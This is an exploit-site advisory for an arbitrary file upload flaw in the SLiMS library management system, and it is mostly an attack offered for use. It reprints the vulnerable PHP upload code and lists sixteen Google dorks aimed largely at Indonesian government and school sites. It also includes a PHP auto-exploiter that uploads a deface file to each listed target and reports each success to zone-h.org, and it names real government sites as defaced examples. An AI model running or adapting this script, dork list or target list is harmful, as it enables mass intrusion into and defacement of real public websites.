Slims Senayan Library Management The Winner of OSS Indonesia 2009 ICT Award Exploit

2018.05.28
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

############################################################################################################## #Exploit Title : Slims CMS Senayan OpenSource Library Management System The Winner in the Category of OSS Indonesia ICT Award 2009 Arbitrary File Upload Vulnerability and Auto Exploiter #Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Team #Vendor Homepage : slims.web.id #Software Download Link : github.com/slims/ * slims.web.id/web/ * slims.web.id/goslims/ #Date : 28/05/2018 #Affected Version : 5/6/7 #Tested on : Windows / Linux #Exploit Risk : High ############################################################################################################## #Short Exploit Title : Slims Senayan Library Management The Winner of OSS Indonesia 2009 ICT Award Exploit Description : SLiMS (Senayan Library Management System) is a free and open source Library Management System. It is build on free and open source technology like PHP and MySQL. SLiMS provides many features such as bibliography database, circulation, membership management and many more that will help "automating" library tasks. Features : Online Public Access Catalog (OPAC) with thumbnail document image support (can be use for book cover), Simple Search and Advanced Search mode Digital contents/files (PDF, DOC, RTF, XLS, PPT, Video, Audio, etc.) attachment in each bibliographic record support Documents record detail in MODS (Metadata Object Description Schema) XML format RSS (Really Simple Syndication) XML format for OPAC OAI-PMH (Open Archives Initiative Protocol for Metadata Harvesting) in Dublin Core format for metadata harvesting purpose Bibliographic/catalog database management with book cover image support Serial publication control Document items (book copies) management with barcode support Master Files management to manages document referential data such as GMD, Collection Types, Publishers, Authors, Locations, Authors and Suppliers Circulation support with following sub-features : Loan and Return transaction Collections reservation Quick return Configurable and flexible Loan Rules Membership management Stock Taking module to help Stock Op name process in library Reporting and Statistics System modules with following sub-features : Global system configuration Modules management Application Users and Groups management Holiday settings Barcodes generator utility Database backup utility Responsive user interface 3rd party bibliographic records indexing support with Sphinx Search and MongoDB Demo Version : softaculous.com/softaculous/demos/SLiMS Admin Username: admin Admin Password: pass ############################################################################################################## #Slims CMS Senayan OpenSource Library Management System File Attachment Arbitrary File Upload Vulnerability Original Affected Code Here => # Example Affected Code from slims5_meranti [ Original Vulnerability Code ] => [/code]<?php /** * Copyright (C) 2007,2008 Arie Nugraha (dicarve@yahoo.com) * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA * */ /* Biblio file Adding Pop Windows */ // key to authenticate define('INDEX_AUTH', '1'); // key to get full database access define('DB_ACCESS', 'fa'); // main system configuration require '../../../sysconfig.inc.php'; // IP based access limitation require LIB_DIR.'ip_based_access.inc.php'; do_checkIP('smc'); do_checkIP('smc-bibliography'); // start the session require SENAYAN_BASE_DIR.'admin/default/session.inc.php'; require SENAYAN_BASE_DIR.'admin/default/session_check.inc.php'; require SIMBIO_BASE_DIR.'simbio_GUI/table/simbio_table.inc.php'; require SIMBIO_BASE_DIR.'simbio_GUI/form_maker/simbio_form_table.inc.php'; require SIMBIO_BASE_DIR.'simbio_DB/simbio_dbop.inc.php'; require SIMBIO_BASE_DIR.'simbio_FILE/simbio_file_upload.inc.php'; require SIMBIO_BASE_DIR.'simbio_FILE/simbio_directory.inc.php'; // privileges checking $can_write = utility::havePrivilege('bibliography', 'w'); if (!$can_write) { die('<div class="errorBox">'.__('You are not authorized to view this section').'</div>'); } // page title $page_title = 'File Attachment Upload'; // check for biblio ID in url $biblioID = 0; if (isset($_GET['biblioID']) AND $_GET['biblioID']) { $biblioID = (integer)$_GET['biblioID']; } // check for file ID in url $fileID = 0; if (isset($_GET['fileID']) AND $_GET['fileID']) { $fileID = (integer)$_GET['fileID']; } // start the output buffer ob_start(); /* main content */ // biblio topic save proccess if (isset($_POST['upload']) AND trim(strip_tags($_POST['fileTitle'])) != '') { $uploaded_file_id = 0; $title = trim(strip_tags($_POST['fileTitle'])); $url = trim(strip_tags($_POST['fileURL'])); // create new sql op object $sql_op = new simbio_dbop($dbs); // FILE UPLOADING if (isset($_FILES['file2attach']) AND $_FILES['file2attach']['size']) { // create upload object $file_dir = trim($_POST['fileDir']); $file_upload = new simbio_file_upload(); $file_upload->setAllowableFormat($sysconf['allowed_file_att']); $file_upload->setMaxSize($sysconf['max_upload']*1024); $file_upload->setUploadDir(REPO_BASE_DIR.DIRECTORY_SEPARATOR.str_replace('/', DIRECTORY_SEPARATOR, $file_dir)); $file_upload_status = $file_upload->doUpload('file2attach'); if ($file_upload_status === UPLOAD_SUCCESS) { $file_ext = substr($file_upload->new_filename, strrpos($file_upload->new_filename, '.')+1); $fdata['uploader_id'] = $_SESSION['uid']; $fdata['file_title'] = $dbs->escape_string($title); $fdata['file_name'] = $dbs->escape_string($file_upload->new_filename); $fdata['file_url'] = $dbs->escape_string($url); $fdata['file_dir'] = $dbs->escape_string($file_dir); $fdata['file_desc'] = $dbs->escape_string(trim(strip_tags($_POST['fileDesc']))); $fdata['mime_type'] = $sysconf['mimetype'][$file_ext]; $fdata['input_date'] = date('Y-m-d H:i:s'); $fdata['last_update'] = $fdata['input_date']; // insert file data to database @$sql_op->insert('files', $fdata); $uploaded_file_id = $sql_op->insert_id; utility::writeLogs($dbs, 'staff', $_SESSION['uid'], 'bibliography', $_SESSION['realname'].' upload file ('.$file_upload->new_filename.')'); } else { echo '<script type="text/javascript">'; echo 'alert(\''.__('Upload FAILED! Forbidden file type or file size too big!').'\');'; echo 'self.close();'; echo '</script>'; die(); } } else { if ($url && preg_match('@^(http|https|ftp|gopher):\/\/@i', $url)) { $fdata['uploader_id'] = $_SESSION['uid']; $fdata['file_title'] = $dbs->escape_string($title); $fdata['file_name'] = $dbs->escape_string($url); $fdata['file_url'] = $dbs->escape_string($fdata['file_name']); $fdata['file_dir'] = 'literal{NULL}'; $fdata['file_desc'] = $dbs->escape_string(trim(strip_tags($_POST['fileDesc']))); $fdata['mime_type'] = 'text/uri-list'; $fdata['input_date'] = date('Y-m-d H:i:s'); $fdata['last_update'] = $fdata['input_date']; // insert file data to database @$sql_op->insert('files', $fdata); $uploaded_file_id = $sql_op->insert_id; } } // BIBLIO FILE RELATION DATA UPDATE // check if biblio_id POST var exists if (isset($_POST['updateBiblioID']) AND !empty($_POST['updateBiblioID'])) { $updateBiblioID = (integer)$_POST['updateBiblioID']; $data['biblio_id'] = $updateBiblioID; $data['file_id'] = $uploaded_file_id; $data['access_type'] = trim($_POST['accessType']); $data['access_limit'] = 'literal{NULL}'; // parsing member type data if ($data['access_type'] == 'public') { $groups = ''; if (isset($_POST['accLimit']) AND count($_POST['accLimit']) > 0) { $groups = serialize($_POST['accLimit']); } else { $groups = 'literal{NULL}'; } $data['access_limit'] = trim($groups); } if (isset($_POST['updateFileID'])) { $fileID = (integer)$_POST['updateFileID']; // file biblio access update $update1 = $sql_op->update('biblio_attachment', array('access_type' => $data['access_type'], 'access_limit' => $data['access_limit']), 'biblio_id='.$updateBiblioID.' AND file_id='.$fileID); // file description update $update2 = $sql_op->update('files', array('file_title' => $title, 'file_url' => $url, 'file_desc' => $dbs->escape_string(trim($_POST['fileDesc']))), 'file_id='.$fileID); if ($update1) { echo '<script type="text/javascript">'; echo 'alert(\''.__('File Attachment data updated!').'\');'; echo 'parent.setIframeContent(\'attachIframe\', \''.MODULES_WEB_ROOT_DIR.'bibliography/iframe_attach.php?biblioID='.$updateBiblioID.'\');'; echo '</script>'; } else { utility::jsAlert(''.__('File Attachment data FAILED to update!').''."\n".$sql_op->error); } } else { if ($sql_op->insert('biblio_attachment', $data)) { echo '<script type="text/javascript">'; echo 'alert(\''.__('File Attachment uploaded succesfully!').'\');'; echo 'parent.setIframeContent(\'attachIframe\', \''.MODULES_WEB_ROOT_DIR.'bibliography/iframe_attach.php?biblioID='.$data['biblio_id'].'\');'; echo '</script>'; } else { utility::jsAlert(''.__('File Attachment data FAILED to save!').''."\n".$sql_op->error); } } utility::writeLogs($dbs, 'staff', $_SESSION['uid'], 'bibliography', $_SESSION['realname'].' updating file attachment data'); } else { if ($uploaded_file_id) { // add to session array $fdata['file_id'] = $uploaded_file_id; $fdata['access_type'] = trim($_POST['accessType']); $_SESSION['biblioAttach'][$uploaded_file_id] = $fdata; echo '<script type="text/javascript">'; echo 'alert(\''.__('File Attachment uploaded succesfully!').'\');'; echo 'parent.setIframeContent(\'attachIframe\', \''.MODULES_WEB_ROOT_DIR.'bibliography/iframe_attach.php\');'; echo '</script>'; } } } // create new instance $form = new simbio_form_table('mainForm', $_SERVER['PHP_SELF'].'?biblioID='.$biblioID, 'post'); $form->submit_button_attr = 'name="upload" value="'.__('Upload Now').'" class="button"'; // form table attributes $form->table_attr = 'align="center" id="dataList" cellpadding="5" cellspacing="0"'; $form->table_header_attr = 'class="alterCell" style="font-weight: bold;"'; $form->table_content_attr = 'class="alterCell2"'; // query $file_attach_q = $dbs->query("SELECT fl.*, batt.* FROM files AS fl LEFT JOIN biblio_attachment AS batt ON fl.file_id=batt.file_id WHERE batt.biblio_id=$biblioID AND batt.file_id=$fileID"); $file_attach_d = $file_attach_q->fetch_assoc(); // edit mode if ($file_attach_d['biblio_id'] AND $file_attach_d['file_id']) { $form->addHidden('updateBiblioID', $file_attach_d['biblio_id']); $form->addHidden('updateFileID', $file_attach_d['file_id']); } else if ($biblioID) { $form->addHidden('updateBiblioID', $biblioID); } // file title $form->addTextField('text', 'fileTitle', __('Title').'*', $file_attach_d['file_title'], 'style="width: 95%; overflow: auto;"'); // file attachment if ($file_attach_d['file_name']) { $form->addAnything('Attachment', $file_attach_d['file_dir'].'/'.$file_attach_d['file_name']); } else { // file upload dir // create simbio directory object $repo = new simbio_directory(REPO_BASE_DIR); $repo_dir_tree = $repo->getDirectoryTree(5); $repodir_options[] = array('', __('Repository ROOT')); if (is_array($repo_dir_tree)) { // sort array by index ksort($repo_dir_tree); // loop array foreach ($repo_dir_tree as $dir) { $repodir_options[] = array($dir, $dir); } } // add repo directory options to select list $form->addSelectList('fileDir', __('Repo. Directory'), $repodir_options); // file upload $str_input = simbio_form_element::textField('file', 'file2attach'); $str_input .= ' Maximum '.$sysconf['max_upload'].' KB'; $form->addAnything(__('File To Attach'), $str_input); } // file url $form->addTextField('textarea', 'fileURL', __('URL'), $file_attach_d['file_url'], 'rows="1" style="width: 100%; overflow: auto;"'); // file description $form->addTextField('textarea', 'fileDesc', __('Description'), $file_attach_d['file_desc'], 'rows="2" style="width: 100%; overflow: auto;"'); // file access $acctype_options[] = array('public', __('Public')); $acctype_options[] = array('private', __('Private')); $form->addSelectList('accessType', __('Access'), $acctype_options, $file_attach_d['access_type']); // file access limit if set to public $group_query = $dbs->query('SELECT member_type_id, member_type_name FROM mst_member_type'); $group_options = array(); while ($group_data = $group_query->fetch_row()) { $group_options[] = array($group_data[0], $group_data[1]); } $form->addCheckBox('accLimit', __('Access Limit by Member Type'), $group_options, !empty($file_attach_d['access_limit'])?unserialize($file_attach_d['access_limit']):null ); // print out the object echo $form->printOut(); /* main content end */ $content = ob_get_clean(); // include the page template require SENAYAN_BASE_DIR.'/admin/'.$sysconf['admin_template']['dir'].'/notemplate_page_tpl.php';[/code] ############################################################################################################## #Short Exploit Title : Slims Senayan Library Management The Winner of OSS Indonesia 2009 ICT Award Exploit #Google Dork 1 : intext:''The Winner in the Category of OSS Indonesia ICT Award 2009'' #Google Dork 2 : inurl:''index.php?p=show_detail&id='' site:id #Google Dork 3 : inurl:''/slims5-meranti/'' site:id #Google Dork 4 : intext:This software and this template are released Under GNU GPL License Version 3. The Winner in the Category of OSS Indonesia ICT Award 2009'' #Google Dork 5 : Powered by SLiMS site:id #Google Dork 6 : Powered by SLiMS | Design by Indra Sutriadi Pipii #Google Dork 7 : Beranda Depan · Info Perpustakaan · Area Anggota · Pustakawan · Bantuan Pencarian · MASUK Pustakawan. #Google Dork 8 : Akses Katalog Publik Daring - Gunakan fasilitas pencarian untuk mempercepat penemuan data katalog. #Google Dork 9 : SLiMS (Senayan Library Management System) is an open source Library Management System. It is build on Open source technology like PHP and MySQL. #Google Dork 10 : PERPUSTAKAAN - Web Online Public Access Catalog - Use the search options to find documents quickly This software and this template are released Under GNU GPL License Version 3 #Google Dork 11 : inurl:''/index.php?select_lang='' site:sch.id #Google Dork 12 : Web Online Public Access Catalog - Gunakan fasilitas pencarian untuk mempercepat anda menemukan data katalog #Google Dork 13 : Welcome To Senayan Library's Online Public Access Catalog (OPAC). Use OPAC to search collection in our library. #Google Dork 14 : O.P.A.C. (On-line Public Access Catalogue) #Google Dork 15 : inurl:''/perpustakaan/repository/'' site:id #Google Dork 16 : Senayan | Open Source Library Management System :: OPAC Note : Use your brain to find more dorks. Note : Please upgrade and update your site on the latest versions of SLİMS Senayan Library Management System and do not let special characters or add admin in the next version. #Exploit Code : ..../admin/modules/bibliography/pop_attach.php #Path : /repository/.... # Note : Fill the form and choose your file and upload it. # Allowed File Extensions : txt jpg gif png #Indonesian Government / Education Sites are vulnerable for this issue. #Attackers can exploit this issue via a browser or with Auto PHP Exploiter tool. ############################################################################################################## #Auto Exploiter PHP Code => [code]<?php /* # KingSkrupellos from Cyberizm Digital Security Team # Our Security Forum : cyberizm.org # Twitter : twitter.com/kngskrplls # your list.txt must a single directory with this exploiter # ############################################### # This Exploit and Vulnerability was discovered by KingSkrupellos # Thanks for All Moslem Hackers and Cyberizm Digital Security Team # This Exploiter may sometimes couldn't work %100 because sometimes the bot don't understand the command. # If the command don't understand the command, please exploit it manually. # Special thanks : All Moslem Hackers and Cyberizm Digital Security Team ################################################# # note : Please do not remove Cyberizm copyright. # This Exploit Coded By KingSkrupellos from Cyberizm Digital Security Team */ echo " File Attachment Auto Exploiter - coded by KingSkrupellos $ Thanks for All Moslem Hackers and Cyberizm Digital Security Team "; echo "Input your target list: "; $list = trim(fgets(STDIN)); $shell = "yourdefacefilename.txt"; $nickzoneh = "KingSkrupellos"; $exploit = "/admin/modules/bibliography/pop_attach.php"; $path = "/repository/"; $open = fopen("$list","r"); $size = filesize("$list"); $read = fread($open,$size); $lists = explode("\r\n",$read); echo "\n"; foreach($lists as $target){ if(!preg_match("/^http:\/\//",$target) AND !preg_match("/^https:\/\//",$target)){ $targets = "http://$target"; }else{ $targets = $target; } echo "Target => $targets\n"; echo " [*] Checking Path : "; $cd = curl_init("$targets$exploit"); curl_setopt($cd, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($cd, CURLOPT_RETURNTRANSFER, 1); curl_exec($cd); $httpcode = curl_getinfo($cd, CURLINFO_HTTP_CODE); curl_close($cd); if($httpcode == 200){ echo "200 OK\n"; echo " [*] Uploading shell : "; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "$targets/$exploit"); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, array("fileTitle"=>"CyBeRiZM" , "file2attach"=>"@$shell" , "upload"=>"Unggah Sekarang")); curl_exec($ch); $cek = curl_init(); curl_setopt($cek, CURLOPT_URL, "$targets$path$shell"); curl_setopt($cek, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($cek, CURLOPT_RETURNTRANSFER, 1); $ceek = curl_exec($cek); $ceeks = curl_getinfo($cek, CURLINFO_HTTP_CODE); if(preg_match("/hacked/",$ceek) or $ceeks == 200){ echo "OK $targets$path$shell\n"; echo " [*] Zone-H : "; $zh = curl_init("http://zone-h.org/notify/single"); curl_setopt($zh, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($zh, CURLOPT_RETURNTRANSFER, 1); curl_setopt($zh, CURLOPT_POST, 1); curl_setopt($zh, CURLOPT_POSTFIELDS, array("defacer"=>"$nickzoneh","domain1"=>"$targets$path$shell","hackmode"=>"18","reason"=>"5")); $postzh = curl_exec($zh); if(preg_match("/color=\"red\">OK<\/font><\/li>/i",$postzh)){ echo "OK\n\n"; }else{ echo "NO\n\n"; } }else{ echo "Failed\n\n"; } }else{ echo "Not Vulnerable\n\n"; } }[/code] ############################################################################################################## # Example Sites : # pXerpustakaan.pn-bangli.go.id/admin/modules/bibliography/pop_attach.php => [ Proof of Concept ] => archive.is/dAL3j => archive.is/Ott9S # pXta-banjarmasin.go.id/perpustakaan/admin/modules/bibliography/pop_attach.php => [ Proof of Concept ] => archive.is/lPDdv => archive.is/BNiKP # pXn-singaraja.go.id/opac/admin/modules/bibliography/pop_attach.php => [ Proof of Concept ] => archive.is/veBCj - archive.is/GEOy6 ############################################################################################################## # Discovered By Hacker KingSkrupellos from Cyberizm Digital Security Technological Turkish Moslem Army ##############################################################################################################


Vote for this issue:
80%
20%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top